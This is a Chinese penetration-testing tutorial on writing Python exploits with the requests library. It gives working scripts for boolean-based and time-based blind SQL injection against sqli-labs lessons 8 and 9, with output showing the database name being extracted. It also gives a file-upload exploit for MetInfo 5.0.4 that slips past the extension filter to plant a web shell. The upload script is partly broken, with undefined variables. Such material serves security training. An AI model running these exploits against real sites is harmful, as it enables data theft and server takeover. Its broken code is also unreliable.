[渗透测试]：python poc-exp

[渗透测试]：python poc-exp

 

python 编写EXP

 

exp 漏洞利用工具

 

以Web 漏洞为主

 

1、能够看懂别人写的exp,并修改

 

2、能自己写exp

 

    基础环境 python3

 

    核心模块 requests

 

requests模块

 

定制头部

 

重新定义User-Agent 信息

 

超时

 

GET 传参

 

POST 传参

 

文件上传

 

cookie 信息

 

用pytho脚本实现布尔盲注

 

以sqli-labss-8为例：

 

    import requests

    import string

     

    url = "http://192.168.1.200/sqli-labs/Less-8/"

     

    normalHtmlLen = len(requests.get(url=url+"?id=1").text)

     

    print("The len of HTML: "+str(normalHtmlLen))

     

    dbNameLen =0

     

    while True:

        dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"

        #print(dbNameLen_url)

     

        if len(requests.get(dbNameLen_url).text) == normalHtmlLen:

            print("The len of dbNameLen: "+str(dbNameLen))

            break

     

        if dbNameLen == 30:

            print("ERROR!")

            break

     

        dbNameLen +=1

     

    dbName=""

     

    for i in range(1,9):

        for a in string.ascii_lowercase:

            dbName_url = url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"

            #print(dbName_url)

            if len(requests.get(dbName_url).text) == normalHtmlLen:

                dbName +=a

                print("The dbName :"+dbName)

                break

 

    ------------

 

    The len of HTML: 706

 

    The len of dbNameLen: 8

 

    The dbName :s

 

    The dbName :se

 

    The dbName :sec

 

    The dbName :secu

 

    The dbName :secur

 

    The dbName :securi

 

    The dbName :securit

 

    The dbName :security

 

    >>>

 

    -----------

 

用python脚本实现延时注入

 

以sqli-labs-9为例：

 

    import requests

    import string

     

    url = "http://192.168.1.200/sqli-labs/Less-9/"

     

    def timeOut(url):

        try:

            res = requests.get(url,timeout=3)

            return res.text

     

        except Exception as e:

            return "timeout"

     

    dbNameLen = 0

     

    while True:

        dbNameLen +=1

        dbNameLen_url = url+"?id=1'+and+if(length(database())="+str(dbNameLen)+",sleep(5),1) --+"

        #print(dbNameLen_url)

     

        if "timeout" in timeOut(dbNameLen_url):

            print("The Len of dbName: "+str(dbNameLen))

            break;

     

        if dbNameLen == 30:

            print("ERROR!")

            break;

     

    dbName = ""

     

    for i in range(1,dbNameLen+1):

        for char in string.ascii_lowercase:

            dbName_url = url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+char+"',sleep(5),1)--+"

            #print(dbName_url)

     

            if "timeout" in timeOut(dbName_url):

                dbName +=char

                print("The dbName :"+dbName)

                break;

 

    ---------------

 

    The Len of dbName: 8

 

    The dbName :s

 

    The dbName :se

 

    The dbName :sec

 

    The dbName :secu

 

    The dbName :secur

 

    The dbName :securi

 

    The dbName :securit

 

    The dbName :security

 

    >>>

 

    -----------------

 

文件上传

 

以Metinfov5.0.4为例：

 

    import requests

    import sys

     

    url = sys.argv[1]

     

    postUrl = urL+"http://192.168.1.200/metinfov504/metinfov504/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=123.com&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"

     

    upFile = {"FileData":open(path,"rb")}

     

    res = requests.post(url=postUrl,files=upFile)

     

    print("The Shell path:"+url+res.text[4:])